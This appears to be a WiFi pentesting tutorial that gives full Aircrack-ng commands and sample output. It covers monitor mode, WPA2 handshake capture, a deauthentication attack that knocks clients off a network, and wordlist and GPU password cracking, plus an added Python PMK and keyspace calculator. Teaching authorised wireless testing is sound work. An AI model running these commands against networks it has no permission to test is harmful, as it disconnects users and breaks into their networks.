WiFi Pentesting with Aircrack-ng Suite

A comprehensive guide to wireless network security testing using Aircrack-ng tools for educational purposes.

Spaidy Security Team
February 8, 2026
15 min read
Tags: Security, Pentesting, WiFi, Aircrack-ng

Warning
This tutorial is for educational purposes only. Only test on networks you own or have explicit permission to test. Unauthorized access to computer networks is illegal.

Introduction to Aircrack-ng

Aircrack-ng is a complete suite of tools to assess WiFi network security. It focuses on different areas of WiFi security including monitoring, attacking, testing, and cracking. The suite includes tools like airmon-ng, airodump-ng, aireplay-ng, and aircrack-ng itself.

Tip
Before starting, make sure you have a wireless adapter that supports monitor mode and packet injection. Popular chipsets include Atheros AR9271 and Ralink RT3070.

Prerequisites

First, let's install Aircrack-ng on a Debian-based system:

bash
# Update package list
sudo apt update

# Install Aircrack-ng suite
sudo apt install aircrack-ng -y

# Verify installation
aircrack-ng --version

[Figure 1: Capturing WiFi traffic using airodump-ng]

Expected Output

text
Aircrack-ng 1.7
https://www.aircrack-ng.org

Compiled with gcc 11.3.0
OpenSSL 3.0.2
SQLite 3.37.2
SIMD support: AVX2

Step 1: Check Wireless Interface

Next, identify your wireless interface and check whether it supports monitor mode:

bash
# List wireless interfaces
iwconfig

# Check interface details
iw list

Sample Output

text
wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   
          Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

Step 2: Enable Monitor Mode

Monitor mode allows your wireless adapter to capture all WiFi traffic in range, not just packets addressed to your device.

bash
# Kill processes that might interfere
sudo airmon-ng check kill

# Enable monitor mode on wlan0
sudo airmon-ng start wlan0

# Verify monitor mode is enabled
iwconfig

Expected Output

text
PHY     Interface       Driver          Chipset

phy0    wlan0           ath9k_htc       Atheros AR9271

(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)

Info
After enabling monitor mode, your interface will typically be renamed to wlan0mon or similar.

Step 3: Discover Networks

Now let's scan for nearby WiFi networks using airodump-ng:

bash
# Start scanning on all channels
sudo airodump-ng wlan0mon

# Scan specific channel (e.g., channel 6)
sudo airodump-ng -c 6 wlan0mon

Sample Airodump Output

text
 CH  6 ][ Elapsed: 12 s ][ 2026-02-08 10:30 

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 A4:12:42:8B:9E:3C  -42       23       45    3   6  540  WPA2 CCMP   PSK  MyTestNetwork
 B8:27:EB:4D:2F:1A  -67       12        0    0   6  130  WPA2 CCMP   PSK  OfficeWiFi
 C4:8E:8F:F1:6C:9D  -73        8        2    0  11  270  WPA2 CCMP   PSK  Neighbor_WiFi

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 A4:12:42:8B:9E:3C  DC:A6:32:1F:8B:4E  -45    0 - 1      0       12  MyTestNetwork
 A4:12:42:8B:9E:3C  E8:94:F6:2A:3C:7B  -52   54 -54      0       28  MyTestNetwork

Note
Understanding the Output:
  • BSSID: MAC address of the access point
  • PWR: Signal strength (-1 is best, -100 is worst)
  • CH: Channel number
  • ENC: Encryption type (WEP, WPA, WPA2, WPA3)
  • STATION: Connected client MAC addresses

Step 4: Capture Handshake

To crack a WPA/WPA2 password, we need to capture the 4-way handshake that occurs when a device connects to the network:

bash
# Capture traffic from target network
# Replace BSSID with target AP MAC, CHANNEL with target channel
sudo airodump-ng -c 6 --bssid A4:12:42:8B:9E:3C -w capture wlan0mon

Tip
The -w capture flag saves packets to files named capture-01.cap, capture-02.cap, etc.

Capturing Output

text
 CH  6 ][ Elapsed: 1 min ][ 2026-02-08 10:35 ][ WPA handshake: A4:12:42:8B:9E:3C 

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 A4:12:42:8B:9E:3C  -38 100       89      324   12   6  540  WPA2 CCMP   PSK  MyTestNetwork

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 A4:12:42:8B:9E:3C  DC:A6:32:1F:8B:4E  -42   54e-54    127     891  MyTestNetwork

Deauthentication Attack (Optional)

If no handshake is captured naturally, you can deauthenticate a client to force a reconnection:

bash
# Deauth attack (in a new terminal)
# -0 10: Send 10 deauth packets
# -a: Target AP BSSID
# -c: Target client MAC address (the STATION column in airodump-ng)
sudo aireplay-ng -0 10 -a A4:12:42:8B:9E:3C -c DC:A6:32:1F:8B:4E wlan0mon

Deauth Output

text
10:35:42  Waiting for beacon frame (BSSID: A4:12:42:8B:9E:3C) on channel 6
10:35:42  Sending 64 directed DeAuth (code 7). STMAC: [DC:A6:32:1F:8B:4E] [ 1|65 ACKs]
10:35:43  Sending 64 directed DeAuth (code 7). STMAC: [DC:A6:32:1F:8B:4E] [ 2|68 ACKs]
10:35:44  Sending 64 directed DeAuth (code 7). STMAC: [DC:A6:32:1F:8B:4E] [ 3|72 ACKs]

Warning
Deauthentication attacks temporarily disconnect users from the network. This should only be performed on networks you own or have permission to test.

Step 5: Crack the Password

Once you have captured a handshake, you can attempt to crack it using a wordlist:

bash
# Basic dictionary attack
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b A4:12:42:8B:9E:3C capture-01.cap

# With specific ESSID
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -e MyTestNetwork capture-01.cap

Cracking Process Output

text
Opening capture-01.cap
Reading packets, please wait...

                                 Aircrack-ng 1.7

      [00:00:00] 8234/14344392 keys tested (1456.78 k/s) 

      Time left: 2 hours 43 minutes 18 seconds                   0.06%

                           KEY FOUND! [ testpassword123 ]


      Master Key     : 8B 7D 4F 2E 9C 1A 3F 6D 5E 8A 2B 4C 7D 9E 1F 3A 
                       6B 8C 4D 2E 9F 1B 3D 5E 7A 9C 2B 4D 6F 8E 1A 3C 

      Transient Key  : 4D 2E 9F 1B 3D 5E 7A 9C 2B 4D 6F 8E 1A 3C 5B 7D
                       9E 2F 4A 6C 8D 1E 3F 5B 7C 9D 2E 4F 6A 8B 1C 3D
                       5E 7F 9A 2C 4D 6E 8F 1A 3B 5C 7D 9E 2F 4A 6B 8C
                       1D 3E 5F 7A 9B 2C 4D 6E 8F 1A 3B 5C 7D 9E 2F 4A

      EAPOL HMAC     : A3 B4 C5 D6 E7 F8 09 1A 2B 3C 4D 5E 6F 70 81 92

Success
If the password is in your wordlist, Aircrack-ng will find it and display KEY FOUND! along with the password.

Step 6: Disable Monitor Mode

When you're done testing, disable monitor mode to return to normal operation:

bash
# Stop monitor mode
sudo airmon-ng stop wlan0mon

# Restart network manager
sudo systemctl restart NetworkManager

Advanced Techniques

Creating Custom Wordlists

You can create targeted wordlists using tools like crunch:

bash
# Install crunch
sudo apt install crunch

# Generate wordlist with 8-10 character passwords
# Using lowercase letters and numbers
crunch 8 10 abcdefghijklmnopqrstuvwxyz0123456789 -o custom-wordlist.txt

# Generate with pattern (e.g., Password followed by 4 digits)
# In crunch -t patterns, % is a digit placeholder (@ = lowercase, , = uppercase, ^ = symbol)
crunch 12 12 -t Password%%%% -o pattern-wordlist.txt
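As an added example that is not part of the original tutorial or the Aircrack-ng project, the Python below reproduces the WPA/WPA2-PSK key derivation behind the "Master Key" line in the Step 5 output and sizes the dictionary attack from Step 5 and the crunch wordlists above. The rate and rockyou line count are the ones shown in the Step 5 output; the passphrase/SSID pair "password"/"IEEE" is the published IEEE 802.11i test vector.

```python
# Added example (not from the tutorial): WPA/WPA2-PSK PMK derivation and
# a back-of-the-envelope cost model for the wordlist attack in Step 5.
import hashlib

PBKDF2_ITERATIONS = 4096   # fixed by IEEE 802.11i for WPA/WPA2-PSK
PMK_LEN = 32               # 256-bit Pairwise Master Key


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This is the value aircrack-ng prints as 'Master Key' after KEY FOUND!
    The SSID acts as the salt, so precomputed tables are per-network."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LEN)


def pmk_hex(passphrase: str, ssid: str) -> str:
    """Space-separated upper-case hex, the way aircrack-ng displays it."""
    return derive_pmk(passphrase, ssid).hex(" ").upper()


def keyspace(charset_size: int, min_len: int, max_len: int) -> int:
    """Number of candidates crunch emits for lengths min_len..max_len."""
    return sum(charset_size ** n for n in range(min_len, max_len + 1))


def seconds_to_exhaust(candidates: int, keys_per_second: float) -> float:
    """Worst-case time to test every candidate at a given rate.
    Note: aircrack-ng's 'k/s' column is keys per second, not thousands."""
    return candidates / keys_per_second


if __name__ == "__main__":
    # IEEE 802.11i test vector: passphrase "password", SSID "IEEE"
    print("PMK:", pmk_hex("password", "IEEE"))

    rate = 1456.78          # keys/s shown in the Step 5 cracking output
    rockyou = 14_344_392    # candidate count shown in the same output
    hours = seconds_to_exhaust(rockyou, rate) / 3600
    print(f"rockyou.txt at {rate} keys/s: about {hours:.1f} hours")

    # The 'crunch 8 10 a-z0-9' list from the wordlist section above
    big = keyspace(36, 8, 10)
    years = seconds_to_exhaust(big, rate) / (3600 * 24 * 365)
    print(f"crunch 8-10 [a-z0-9]: {big:,} candidates, ~{years:,.0f} years")

    # The 'Password%%%%' pattern: only 10^4 candidates, seconds to exhaust
    print(f"Password + 4 digits: {keyspace(10, 4, 4):,} candidates")
```

At the rate shown in Step 5, the 8-10 character crunch list would take on the order of 80,000 years to exhaust (and tens of petabytes to store), which is why the 16+ character passphrase recommended under Security Best Practices is an effective defence against wordlist attacks.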

Using GPU for Faster Cracking

For faster cracking, you can use hashcat with GPU acceleration:

bash
# Convert capture to hashcat format (-j writes the HCCAPX file hashcat -m 2500 expects)
sudo aircrack-ng -j hashcat-capture capture-01.cap

# Crack with hashcat (GPU)
hashcat -m 2500 -a 0 hashcat-capture.hccapx /usr/share/wordlists/rockyou.txt

Security Best Practices

Info
Protecting Your Network:
  • Use WPA3 encryption when available
  • Create strong, unique passwords (16+ characters)
  • Disable WPS (WiFi Protected Setup)
  • Hide SSID broadcast (security through obscurity)
  • Enable MAC address filtering
  • Regularly update router firmware
  • Use a guest network for visitors
  • Monitor connected devices regularly

Common Issues and Solutions

Issue: No Handshake Captured

text
Solution:
1. Wait longer - handshakes occur when devices connect
2. Move closer to the access point
3. Perform deauth attack on connected clients
4. Try different channels if interference is present

Issue: Monitor Mode Not Working

text
Solution:
1. Check if your adapter supports monitor mode
2. Update wireless drivers
3. Try different USB ports
4. Check if airmon-ng killed interfering processes

Issue: Slow Cracking Speed

text
Solution:
1. Use GPU-based cracking with hashcat
2. Use targeted wordlists instead of generic ones
3. Try rainbow tables for common passwords
4. Consider cloud-based cracking services

Conclusion

Aircrack-ng is a powerful suite for WiFi security testing. Understanding how these attacks work helps in securing your own networks against similar threats. Always remember that unauthorized access to networks is illegal and unethical.

Danger
Legal Disclaimer: This guide is provided for educational purposes only. Only perform security testing on networks you own or have explicit written permission to test. Unauthorized access to computer networks is a crime in most jurisdictions and can result in severe legal consequences.

Further Reading